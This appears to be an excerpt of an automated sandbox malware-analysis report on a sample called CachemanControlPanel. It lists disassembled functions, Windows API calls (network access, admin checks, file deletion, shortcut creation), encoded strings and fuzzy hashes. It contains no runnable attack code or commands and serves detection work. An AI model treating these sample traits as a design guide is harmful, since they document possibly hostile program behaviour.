                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Value$Alloc$CriticalCurrentHeapSection$Process$CreateDuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 1511732703-3176450862
                                                        • Opcode ID: af2310562c703aedf8dd3d98fa96ecd737ec24b75379dd452fbd8a4041e34835
                                                        • Instruction ID: c09ea1a98049a414030a84ddb92d1143a438cec1236d9d198fda07a5ce27492c
                                                        • Opcode Fuzzy Hash: af2310562c703aedf8dd3d98fa96ecd737ec24b75379dd452fbd8a4041e34835
                                                        • Instruction Fuzzy Hash: B4E09271200201ABC208BBB1BF099E733ACD704718320562FF214821E1CEB898C1DB6F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLastError.KERNEL32(00404AEC,?,00000000), ref: 004190A6
                                                        • TlsGetValue.KERNEL32(00000022), ref: 004190B5
                                                        • SetLastError.KERNEL32(?), ref: 004190CB
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 004190A0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$Value
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 1883355122-3176450862
                                                        • Opcode ID: 0524db695ba4735544f78c652b154e614e48ca7cb25f2c6756704311e73c146a
                                                        • Instruction ID: 2b3dd9437271b942bf13f2fe52d933277596aa301d273a6797c1349f6051e44d
                                                        • Opcode Fuzzy Hash: 0524db695ba4735544f78c652b154e614e48ca7cb25f2c6756704311e73c146a
                                                        • Instruction Fuzzy Hash: ACE0BF79901208EFC704EFA8EA4885DBBF8EB48211B1095A5E905D3310D6719951DB55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(?,00000000,?,00000001,00000000,00000000,00000000,00430024,00000000,00430024,?,00000000,00000000,?pcn=,00000000,00000000), ref: 004084C3
                                                          • Part of subcall function 00418570: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 00418576
                                                          • Part of subcall function 00418570: TlsGetValue.KERNEL32(00000022), ref: 00418585
                                                          • Part of subcall function 00418570: SetLastError.KERNEL32(?), ref: 0041859B
                                                          • Part of subcall function 00418640: wcslen.MSVCRT ref: 00418657
                                                          • Part of subcall function 004186A0: TlsGetValue.KERNEL32(00000022,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00404B45,00000001,00000001,00000006,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 004186AA
                                                          • Part of subcall function 0040A212: TlsGetValue.KERNEL32(00000000,0040111B,0043101C,FFFFFFFF,00000002,00000000,00000000,00000001,00000020,00000000,00000000,0043383C,00000000,00000000,00000000,0000000C), ref: 0040A219
                                                          • Part of subcall function 00408683: InternetOpenW.WININET(00000000,00000001,00430024,00430024,00000000), ref: 004087AB
                                                          • Part of subcall function 00408683: InternetSetOptionW.WININET(00000000,00000002,000003E8,00000004), ref: 004087C7
                                                          • Part of subcall function 004185B0: TlsGetValue.KERNEL32(00000022,00000000,00000000), ref: 004185BC
                                                          • Part of subcall function 004185B0: RtlAllocateHeap.NTDLL(02A80000,00000000,?), ref: 004185E9
                                                          • Part of subcall function 004185B0: HeapReAlloc.KERNEL32(02A80000,00000000,?,?), ref: 0041860C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorHeapInternetLast$AllocAllocateExistsFileOpenOptionPathwcslen
                                                        • String ID: ?lpc=$?pcn=
                                                        • API String ID: 809141536-1095368061
                                                        • Opcode ID: da892263a3271f18461a17ee992343837e05821a09bad1aba0ef942097584386
                                                        • Instruction ID: 5a14a4b77de11aac561ead76d5a441be77f12fa97676e37856e629325259bb47
                                                        • Opcode Fuzzy Hash: da892263a3271f18461a17ee992343837e05821a09bad1aba0ef942097584386
                                                        • Instruction Fuzzy Hash: 1C613CB5504300BFD600BF61DD829AF76EEEBD4308F50883EB544A61A2DA3DDE91962D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00418710: TlsGetValue.KERNEL32(00000022,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00404AE3,00000000), ref: 00418727
                                                        • IsUserAdmin.SETUPAPI ref: 00403E5E
                                                          • Part of subcall function 00418570: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 00418576
                                                          • Part of subcall function 00418570: TlsGetValue.KERNEL32(00000022), ref: 00418585
                                                          • Part of subcall function 00418570: SetLastError.KERNEL32(?), ref: 0041859B
                                                          • Part of subcall function 0040793C: SHGetSpecialFolderLocation.SHELL32(00000000,00000001,00000000,00000001,00000000,00000000,00000013,00403EAC,00000007,00000000,00000000,00000000,004037C8,00000001,?,?), ref: 0040795C
                                                          • Part of subcall function 0040793C: SHGetPathFromIDListW.SHELL32(?,?), ref: 00407998
                                                          • Part of subcall function 00418640: wcslen.MSVCRT ref: 00418657
                                                          • Part of subcall function 004185B0: TlsGetValue.KERNEL32(00000022,00000000,00000000), ref: 004185BC
                                                          • Part of subcall function 004185B0: RtlAllocateHeap.NTDLL(02A80000,00000000,?), ref: 004185E9
                                                        • PathFileExistsW.SHLWAPI(?,00000000,.lnk,?,00000007,00000000,00000000,00000000,004037C8,00000001,?,?,pidl.conf,00000001,00000000,00000000), ref: 00403EE1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLastPath$AdminAllocateExistsFileFolderFromHeapListLocationSpecialUserwcslen
                                                        • String ID: .lnk
                                                        • API String ID: 2786636982-24824748
                                                        • Opcode ID: 6df6401ed240c804f2b3c3390a7bd55d8495fedea9e5acb7ad8bfe2dca0286d6
                                                        • Instruction ID: aa0a164e640024c76f35ebae998885afcfb72f425ed5f250aeb5e5c9458f5a9b
                                                        • Opcode Fuzzy Hash: 6df6401ed240c804f2b3c3390a7bd55d8495fedea9e5acb7ad8bfe2dca0286d6
                                                        • Instruction Fuzzy Hash: BF216AB9608201BAE640BA72CC42B7F76ADDFD4709F10C93FB144A5192DE3DCD81626E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: codecvt
                                                        • String ID: V[A$V[A
                                                        • API String ID: 3662085145-3242595788
                                                        • Opcode ID: d7a440dceab96d64faece2974184388f27742db449bd5e04e91a6bc50bf2541d
                                                        • Instruction ID: 8161cb448381d23d65c2fb48248412d9a65882e6af44408985668f4ca878458e
                                                        • Opcode Fuzzy Hash: d7a440dceab96d64faece2974184388f27742db449bd5e04e91a6bc50bf2541d
                                                        • Instruction Fuzzy Hash: 24318574A00609DFDB04CF44C594BEEBBB1FB88344F108199D9056B391C779AE86DF84
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00417E13: EnterCriticalSection.KERNEL32(00001020,00000000,?,?,0040CD05,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004091B0,FFFFFFFF,?,00000000,00000000,00000000,00401B6E), ref: 00417E1E
                                                          • Part of subcall function 00417E13: LeaveCriticalSection.KERNEL32(00001020,?,?,0040CD05,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004091B0,FFFFFFFF,?,00000000,00000000,00000000,00401B6E,004338C8), ref: 00417E99
                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,?,?,00000000,004056AE,FFFFFFFF,?,00430D24), ref: 0040CDF3
                                                        • HeapAlloc.KERNEL32(00000000,00001000,?,?,00000000,004056AE,FFFFFFFF,?,00430D24,00000000,00000000,00000000,00000000,004072E5,00000000,00000000), ref: 0040CE15
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0040CDDF
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$AllocCreateEnterFileHeapLeave
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 3705299215-3176450862
                                                        • Opcode ID: 4a7d217bcf300da0512bd09958e99e0ea7039dd9ea8a5b2e5e89620a7ee1074a
                                                        • Instruction ID: 95523ca6d68832a4aadad2b257726d2d91a3262477870f57c5ce0b1a80e4298a
                                                        • Opcode Fuzzy Hash: 4a7d217bcf300da0512bd09958e99e0ea7039dd9ea8a5b2e5e89620a7ee1074a
                                                        • Instruction Fuzzy Hash: B5118271200700ABD2305F1AEC88B57BBF9EBC5B61F10473EF565972E0C775A8558BA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00407D6F,00000000,00000000,00000000,00000000), ref: 004169F2
                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00407D6F,00000000,00000000,00000000), ref: 00416A16
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 004169D0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 626452242-3176450862
                                                        • Opcode ID: 54e8f9440038e49b0d6f0c2ceb64a24e9cfe66aecf19c3a7f57bdeac9f30da18
                                                        • Instruction ID: 39a873e3e1c93b0c92f6a7c3c7a92f061da19fe1c0096474e85eb958f8424f51
                                                        • Opcode Fuzzy Hash: 54e8f9440038e49b0d6f0c2ceb64a24e9cfe66aecf19c3a7f57bdeac9f30da18
                                                        • Instruction Fuzzy Hash: 6FF06D3678532537E231215A5C06F6739988BC6FB0F3602327B24BE2C086E5B80085BC
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetFileAttributesW.KERNEL32(00000002,00000080,0040C834,00000000,00000000,00404DF0,00401927,000003E8,00000000,00000000,?,timers,connect,00000000,00000000,000003E8), ref: 0040C812
                                                        • DeleteFileW.KERNEL32(00000000,0040C834,00000000,00000000,00404DF0,00401927,000003E8,00000000,00000000,?,timers,connect,00000000,00000000,000003E8,00000000), ref: 0040C81C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesDelete
                                                        • String ID: t
                                                        • API String ID: 2910425767-2238339752
                                                        • Opcode ID: ad1c291215ac35ab42d62515913f68220a005732bc84298c94e07d5002785b25
                                                        • Instruction ID: b306eba7cbb2bca043322e4ac5a5bbe2c344cc2d24da8a39c2f9c3c32f6deea9
                                                        • Opcode Fuzzy Hash: ad1c291215ac35ab42d62515913f68220a005732bc84298c94e07d5002785b25
                                                        • Instruction Fuzzy Hash: 03D05E31008301E6C3452710D94D71B7AE0BF80702F00C939F485500F1C7744894E70E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: memcpymemset
                                                        • String ID:
                                                        • API String ID: 1297977491-0
                                                        • Opcode ID: e7feb2428207918bdbbe68e8bd60c1366d5a9154358d43a2f2714e5ebec1e49e
                                                        • Instruction ID: 268f2de06b31dd2433eb91a9e1064fd862cf9558c48e75ca899d24dd93ef507e
                                                        • Opcode Fuzzy Hash: e7feb2428207918bdbbe68e8bd60c1366d5a9154358d43a2f2714e5ebec1e49e
                                                        • Instruction Fuzzy Hash: E2718B36600B018FC720CF2AC9959A7F7E2FF88354B15492EE99287B51D739F895CB84
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,00000000,0040C253,?,00000001,00000000,?,00000000,?,0040C036,?,?,00000000), ref: 00417F0E
                                                        • HeapAlloc.KERNEL32(00000000,?,00000001,00000000,?,00000000,0040C253,?,00000001,00000000,?,00000000,?,0040C036,?,?), ref: 00417FC3
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00417FE6
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0041803E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
